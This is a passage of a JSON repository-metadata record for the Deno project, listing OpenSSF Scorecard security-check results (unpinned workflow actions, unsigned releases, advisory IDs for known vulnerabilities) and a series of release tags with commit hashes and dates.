license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36685524,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-15T02:00:05.847Z","response_time":94,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v